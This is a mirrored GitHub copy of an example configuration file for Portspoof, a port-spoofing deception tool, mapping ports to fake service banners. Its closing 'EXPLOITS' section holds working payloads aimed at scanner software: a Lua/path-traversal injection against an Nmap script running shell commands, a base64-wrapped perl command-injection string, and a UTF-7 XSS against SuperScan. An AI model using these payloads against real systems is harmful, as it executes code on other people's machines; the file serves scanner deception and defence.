mirror of
https://github.com/drk1wi/portspoof.git
synced 2024-07-03 00:34:09 +00:00
108 lines
6.5 KiB
Plaintext
Executable File
108 lines
6.5 KiB
Plaintext
Executable File
|
|
# This is an example Portspoof configuration file
|
|
#
|
|
# :Examples:
|
|
#
|
|
# 1. SINGLE PORT
|
|
#
|
|
# port "payload"
|
|
#
|
|
# 2. PORT RANGE
|
|
#
|
|
# port_nr_start-port_nr_start "payload"
|
|
#
|
|
# 3. PAYLOAD: Hex Encoded (useful for exploits)
|
|
#
|
|
# port "\x20\x20\x41\x41\x41 string payload"
|
|
#
|
|
# 4. PAYLOAD: Regular expressions
|
|
#
|
|
# port "regular_expression [\w]+ ..."
|
|
|
|
|
|
#Example: Send custom payload (this can be a simple string)
|
|
|
|
1 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
2 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
3 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
4 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
5 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
|
|
7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00"
|
|
8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00"
|
|
9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00"
|
|
10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00"
|
|
11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00"
|
|
12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00"
|
|
13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00"
|
|
14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00"
|
|
15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00"
|
|
16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00"
|
|
17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00"
|
|
18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00"
|
|
19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00"
|
|
20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00"
|
|
21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00"
|
|
22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00"
|
|
23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00"
|
|
24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00"
|
|
25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00"
|
|
26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00"
|
|
27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00"
|
|
28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00"
|
|
29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00"
|
|
30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00"
|
|
31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00"
|
|
32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00"
|
|
33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00"
|
|
34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00"
|
|
35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00"
|
|
36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00"
|
|
37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00"
|
|
38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00"
|
|
39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00"
|
|
40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00"
|
|
41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00"
|
|
42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00"
|
|
43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00"
|
|
44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00"
|
|
45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00"
|
|
46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00"
|
|
47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
|
|
48 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
49 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
50 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
|
|
|
#Example: port range
|
|
|
|
51-60 "550 4m2v4 (FUZZ_HERE)"
|
|
|
|
#Example: Simple regular expression payloads
|
|
|
|
8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
|
|
8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
|
|
8082 "word: ... \. \d \w \n"
|
|
|
|
#Nmap regular expression matched payloads
|
|
|
|
8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
|
|
8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
|
|
8102 "550 12345 FUZZ_HERE"
|
|
8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
|
|
8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
|
|
|
|
## EXPLOITS ##
|
|
|
|
# NMAP
|
|
# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4
|
|
|
|
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22 value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
|
|
|
|
#OS cmd injection payload for bash: $(cat output) and `cat output` injections
|
|
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
|
|
|
|
#McAffe SuperScan UTF7 XSS payload
|
|
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"
|
|
|
|
|